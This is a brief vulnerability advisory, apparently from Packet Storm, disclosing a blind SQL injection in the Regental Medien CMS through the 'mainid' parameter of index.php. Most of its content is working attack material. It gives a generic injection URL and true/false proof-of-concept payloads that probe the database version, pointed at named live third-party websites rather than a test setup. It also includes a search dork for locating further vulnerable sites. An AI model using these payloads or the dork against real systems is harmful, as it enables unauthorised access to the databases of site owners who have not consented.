Regental Medien suffers from a remote blind SQL injection vulnerability.
374505a1e8bb55f96f8f7d8683d147f6b190c35be8fc4bcc8fee42b09d5c9e15[o] Regental Medien Blind SQL Injection Vulnerability
Software : Regental Medien
Vendor : https://www.regental-medien.de/
Author : NoGe
Home : https://antisecurity.org
[o] Vulnerable file
index.php
[o] Exploit
https://localhost/[path]/index.php?mainid=[SQL]
[o] Proof of Concept
https://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE
https://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE
https://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE
https://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE
[o] Dork
"powered by regental medien"
[o] Note
this is a private script
all target are in one IP address
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed